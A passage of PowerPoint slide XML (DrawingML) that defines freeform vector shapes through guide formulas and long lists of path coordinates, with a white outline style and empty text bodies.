                  <a:gd name="T30" fmla="*/ 116 w 236"/>
                  <a:gd name="T31" fmla="*/ 173 h 183"/>
                  <a:gd name="T32" fmla="*/ 110 w 236"/>
                  <a:gd name="T33" fmla="*/ 177 h 183"/>
                  <a:gd name="T34" fmla="*/ 103 w 236"/>
                  <a:gd name="T35" fmla="*/ 183 h 183"/>
                  <a:gd name="T36" fmla="*/ 93 w 236"/>
                  <a:gd name="T37" fmla="*/ 181 h 183"/>
                  <a:gd name="T38" fmla="*/ 80 w 236"/>
                  <a:gd name="T39" fmla="*/ 180 h 183"/>
                  <a:gd name="T40" fmla="*/ 59 w 236"/>
                  <a:gd name="T41" fmla="*/ 167 h 183"/>
                  <a:gd name="T42" fmla="*/ 46 w 236"/>
                  <a:gd name="T43" fmla="*/ 165 h 183"/>
                  <a:gd name="T44" fmla="*/ 44 w 236"/>
                  <a:gd name="T45" fmla="*/ 163 h 183"/>
                  <a:gd name="T46" fmla="*/ 44 w 236"/>
                  <a:gd name="T47" fmla="*/ 155 h 183"/>
                  <a:gd name="T48" fmla="*/ 39 w 236"/>
                  <a:gd name="T49" fmla="*/ 152 h 183"/>
                  <a:gd name="T50" fmla="*/ 33 w 236"/>
                  <a:gd name="T51" fmla="*/ 147 h 183"/>
                  <a:gd name="T52" fmla="*/ 25 w 236"/>
                  <a:gd name="T53" fmla="*/ 131 h 183"/>
                  <a:gd name="T54" fmla="*/ 12 w 236"/>
                  <a:gd name="T55" fmla="*/ 117 h 183"/>
                  <a:gd name="T56" fmla="*/ 4 w 236"/>
                  <a:gd name="T57" fmla="*/ 115 h 183"/>
                  <a:gd name="T58" fmla="*/ 0 w 236"/>
                  <a:gd name="T59" fmla="*/ 113 h 183"/>
                  <a:gd name="T60" fmla="*/ 2 w 236"/>
                  <a:gd name="T61" fmla="*/ 104 h 183"/>
                  <a:gd name="T62" fmla="*/ 11 w 236"/>
                  <a:gd name="T63" fmla="*/ 105 h 183"/>
                  <a:gd name="T64" fmla="*/ 16 w 236"/>
                  <a:gd name="T65" fmla="*/ 103 h 183"/>
                  <a:gd name="T66" fmla="*/ 18 w 236"/>
                  <a:gd name="T67" fmla="*/ 90 h 183"/>
                  <a:gd name="T68" fmla="*/ 20 w 236"/>
                  <a:gd name="T69" fmla="*/ 75 h 183"/>
                  <a:gd name="T70" fmla="*/ 22 w 236"/>
                  <a:gd name="T71" fmla="*/ 66 h 183"/>
                  <a:gd name="T72" fmla="*/ 27 w 236"/>
                  <a:gd name="T73" fmla="*/ 66 h 183"/>
                  <a:gd name="T74" fmla="*/ 31 w 236"/>
                  <a:gd name="T75" fmla="*/ 64 h 183"/>
                  <a:gd name="T76" fmla="*/ 33 w 236"/>
                  <a:gd name="T77" fmla="*/ 48 h 183"/>
                  <a:gd name="T78" fmla="*/ 39 w 236"/>
                  <a:gd name="T79" fmla="*/ 38 h 183"/>
                  <a:gd name="T80" fmla="*/ 49 w 236"/>
                  <a:gd name="T81" fmla="*/ 33 h 183"/>
                  <a:gd name="T82" fmla="*/ 54 w 236"/>
                  <a:gd name="T83" fmla="*/ 16 h 183"/>
                  <a:gd name="T84" fmla="*/ 55 w 236"/>
                  <a:gd name="T85" fmla="*/ 8 h 183"/>
                  <a:gd name="T86" fmla="*/ 60 w 236"/>
                  <a:gd name="T87" fmla="*/ 9 h 183"/>
                  <a:gd name="T88" fmla="*/ 66 w 236"/>
                  <a:gd name="T89" fmla="*/ 5 h 183"/>
                  <a:gd name="T90" fmla="*/ 75 w 236"/>
                  <a:gd name="T91" fmla="*/ 0 h 183"/>
                  <a:gd name="T92" fmla="*/ 79 w 236"/>
                  <a:gd name="T93" fmla="*/ 2 h 183"/>
                  <a:gd name="T94" fmla="*/ 89 w 236"/>
                  <a:gd name="T95" fmla="*/ 6 h 183"/>
                  <a:gd name="T96" fmla="*/ 93 w 236"/>
                  <a:gd name="T97" fmla="*/ 2 h 183"/>
                  <a:gd name="T98" fmla="*/ 98 w 236"/>
                  <a:gd name="T99" fmla="*/ 5 h 183"/>
                  <a:gd name="T100" fmla="*/ 103 w 236"/>
                  <a:gd name="T101" fmla="*/ 5 h 183"/>
                  <a:gd name="T102" fmla="*/ 106 w 236"/>
                  <a:gd name="T103" fmla="*/ 6 h 183"/>
                  <a:gd name="T104" fmla="*/ 116 w 236"/>
                  <a:gd name="T105" fmla="*/ 10 h 183"/>
                  <a:gd name="T106" fmla="*/ 125 w 236"/>
                  <a:gd name="T107" fmla="*/ 16 h 183"/>
                  <a:gd name="T108" fmla="*/ 136 w 236"/>
                  <a:gd name="T109" fmla="*/ 26 h 183"/>
                  <a:gd name="T110" fmla="*/ 142 w 236"/>
                  <a:gd name="T111" fmla="*/ 34 h 183"/>
                  <a:gd name="T112" fmla="*/ 148 w 236"/>
                  <a:gd name="T113" fmla="*/ 39 h 183"/>
                  <a:gd name="T114" fmla="*/ 140 w 236"/>
                  <a:gd name="T115" fmla="*/ 51 h 183"/>
                  <a:gd name="T116" fmla="*/ 139 w 236"/>
                  <a:gd name="T117" fmla="*/ 55 h 183"/>
                  <a:gd name="T118" fmla="*/ 144 w 236"/>
                  <a:gd name="T119" fmla="*/ 63 h 183"/>
                  <a:gd name="T120" fmla="*/ 153 w 236"/>
                  <a:gd name="T121" fmla="*/ 62 h 183"/>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36"/>
                  <a:gd name="T184" fmla="*/ 0 h 183"/>
                  <a:gd name="T185" fmla="*/ 236 w 236"/>
                  <a:gd name="T186" fmla="*/ 183 h 183"/>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36" h="183">
                    <a:moveTo>
                      <a:pt x="157" y="63"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="155" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="63"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36388" name="Freeform 120"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3629" y="2131"/>
                <a:ext cx="272" cy="182"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 173 w 272"/>
                  <a:gd name="T1" fmla="*/ 176 h 182"/>
                  <a:gd name="T2" fmla="*/ 168 w 272"/>
                  <a:gd name="T3" fmla="*/ 165 h 182"/>
                  <a:gd name="T4" fmla="*/ 162 w 272"/>
                  <a:gd name="T5" fmla="*/ 157 h 182"/>
                  <a:gd name="T6" fmla="*/ 144 w 272"/>
                  <a:gd name="T7" fmla="*/ 149 h 182"/>
                  <a:gd name="T8" fmla="*/ 123 w 272"/>
                  <a:gd name="T9" fmla="*/ 137 h 182"/>
                  <a:gd name="T10" fmla="*/ 102 w 272"/>
                  <a:gd name="T11" fmla="*/ 116 h 182"/>
                  <a:gd name="T12" fmla="*/ 95 w 272"/>
                  <a:gd name="T13" fmla="*/ 99 h 182"/>
                  <a:gd name="T14" fmla="*/ 83 w 272"/>
                  <a:gd name="T15" fmla="*/ 95 h 182"/>
                  <a:gd name="T16" fmla="*/ 70 w 272"/>
                  <a:gd name="T17" fmla="*/ 94 h 182"/>
                  <a:gd name="T18" fmla="*/ 65 w 272"/>
                  <a:gd name="T19" fmla="*/ 85 h 182"/>
                  <a:gd name="T20" fmla="*/ 64 w 272"/>
                  <a:gd name="T21" fmla="*/ 76 h 182"/>
                  <a:gd name="T22" fmla="*/ 53 w 272"/>
                  <a:gd name="T23" fmla="*/ 70 h 182"/>
                  <a:gd name="T24" fmla="*/ 41 w 272"/>
                  <a:gd name="T25" fmla="*/ 62 h 182"/>
                  <a:gd name="T26" fmla="*/ 39 w 272"/>
                  <a:gd name="T27" fmla="*/ 71 h 182"/>
                  <a:gd name="T28" fmla="*/ 30 w 272"/>
                  <a:gd name="T29" fmla="*/ 73 h 182"/>
                  <a:gd name="T30" fmla="*/ 17 w 272"/>
                  <a:gd name="T31" fmla="*/ 80 h 182"/>
                  <a:gd name="T32" fmla="*/ 8 w 272"/>
                  <a:gd name="T33" fmla="*/ 93 h 182"/>
                  <a:gd name="T34" fmla="*/ 82 w 272"/>
                  <a:gd name="T35" fmla="*/ 30 h 182"/>
                  <a:gd name="T36" fmla="*/ 142 w 272"/>
                  <a:gd name="T37" fmla="*/ 41 h 182"/>
                  <a:gd name="T38" fmla="*/ 161 w 272"/>
                  <a:gd name="T39" fmla="*/ 57 h 182"/>
                  <a:gd name="T40" fmla="*/ 167 w 272"/>
                  <a:gd name="T41" fmla="*/ 78 h 182"/>
                  <a:gd name="T42" fmla="*/ 179 w 272"/>
                  <a:gd name="T43" fmla="*/ 96 h 182"/>
                  <a:gd name="T44" fmla="*/ 193 w 272"/>
                  <a:gd name="T45" fmla="*/ 101 h 182"/>
                  <a:gd name="T46" fmla="*/ 201 w 272"/>
                  <a:gd name="T47" fmla="*/ 105 h 182"/>
                  <a:gd name="T48" fmla="*/ 208 w 272"/>
                  <a:gd name="T49" fmla="*/ 91 h 182"/>
                  <a:gd name="T50" fmla="*/ 226 w 272"/>
                  <a:gd name="T51" fmla="*/ 79 h 182"/>
                  <a:gd name="T52" fmla="*/ 235 w 272"/>
                  <a:gd name="T53" fmla="*/ 73 h 182"/>
                  <a:gd name="T54" fmla="*/ 240 w 272"/>
                  <a:gd name="T55" fmla="*/ 76 h 182"/>
                  <a:gd name="T56" fmla="*/ 233 w 272"/>
                  <a:gd name="T57" fmla="*/ 80 h 182"/>
                  <a:gd name="T58" fmla="*/ 225 w 272"/>
                  <a:gd name="T59" fmla="*/ 87 h 182"/>
                  <a:gd name="T60" fmla="*/ 230 w 272"/>
                  <a:gd name="T61" fmla="*/ 91 h 182"/>
                  <a:gd name="T62" fmla="*/ 238 w 272"/>
                  <a:gd name="T63" fmla="*/ 96 h 182"/>
                  <a:gd name="T64" fmla="*/ 247 w 272"/>
                  <a:gd name="T65" fmla="*/ 93 h 182"/>
                  <a:gd name="T66" fmla="*/ 251 w 272"/>
                  <a:gd name="T67" fmla="*/ 91 h 182"/>
                  <a:gd name="T68" fmla="*/ 257 w 272"/>
                  <a:gd name="T69" fmla="*/ 95 h 182"/>
                  <a:gd name="T70" fmla="*/ 262 w 272"/>
                  <a:gd name="T71" fmla="*/ 100 h 182"/>
                  <a:gd name="T72" fmla="*/ 272 w 272"/>
                  <a:gd name="T73" fmla="*/ 104 h 182"/>
                  <a:gd name="T74" fmla="*/ 262 w 272"/>
                  <a:gd name="T75" fmla="*/ 108 h 182"/>
                  <a:gd name="T76" fmla="*/ 258 w 272"/>
                  <a:gd name="T77" fmla="*/ 111 h 182"/>
                  <a:gd name="T78" fmla="*/ 251 w 272"/>
                  <a:gd name="T79" fmla="*/ 115 h 182"/>
                  <a:gd name="T80" fmla="*/ 244 w 272"/>
                  <a:gd name="T81" fmla="*/ 114 h 182"/>
                  <a:gd name="T82" fmla="*/ 238 w 272"/>
                  <a:gd name="T83" fmla="*/ 115 h 182"/>
                  <a:gd name="T84" fmla="*/ 229 w 272"/>
                  <a:gd name="T85" fmla="*/ 112 h 182"/>
                  <a:gd name="T86" fmla="*/ 234 w 272"/>
                  <a:gd name="T87" fmla="*/ 104 h 182"/>
                  <a:gd name="T88" fmla="*/ 225 w 272"/>
                  <a:gd name="T89" fmla="*/ 104 h 182"/>
                  <a:gd name="T90" fmla="*/ 215 w 272"/>
                  <a:gd name="T91" fmla="*/ 103 h 182"/>
                  <a:gd name="T92" fmla="*/ 212 w 272"/>
                  <a:gd name="T93" fmla="*/ 111 h 182"/>
                  <a:gd name="T94" fmla="*/ 204 w 272"/>
                  <a:gd name="T95" fmla="*/ 116 h 182"/>
                  <a:gd name="T96" fmla="*/ 207 w 272"/>
                  <a:gd name="T97" fmla="*/ 118 h 182"/>
                  <a:gd name="T98" fmla="*/ 202 w 272"/>
                  <a:gd name="T99" fmla="*/ 123 h 182"/>
                  <a:gd name="T100" fmla="*/ 190 w 272"/>
                  <a:gd name="T101" fmla="*/ 129 h 182"/>
                  <a:gd name="T102" fmla="*/ 183 w 272"/>
                  <a:gd name="T103" fmla="*/ 137 h 182"/>
                  <a:gd name="T104" fmla="*/ 192 w 272"/>
                  <a:gd name="T105" fmla="*/ 141 h 182"/>
                  <a:gd name="T106" fmla="*/ 193 w 272"/>
                  <a:gd name="T107" fmla="*/ 153 h 182"/>
                  <a:gd name="T108" fmla="*/ 192 w 272"/>
                  <a:gd name="T109" fmla="*/ 163 h 182"/>
                  <a:gd name="T110" fmla="*/ 186 w 272"/>
                  <a:gd name="T111" fmla="*/ 182 h 182"/>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272"/>
                  <a:gd name="T169" fmla="*/ 0 h 182"/>
                  <a:gd name="T170" fmla="*/ 272 w 272"/>
                  <a:gd name="T171" fmla="*/ 182 h 182"/>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272" h="182">
                    <a:moveTo>
                      <a:pt x="186" y="182"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="183" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="96"/>
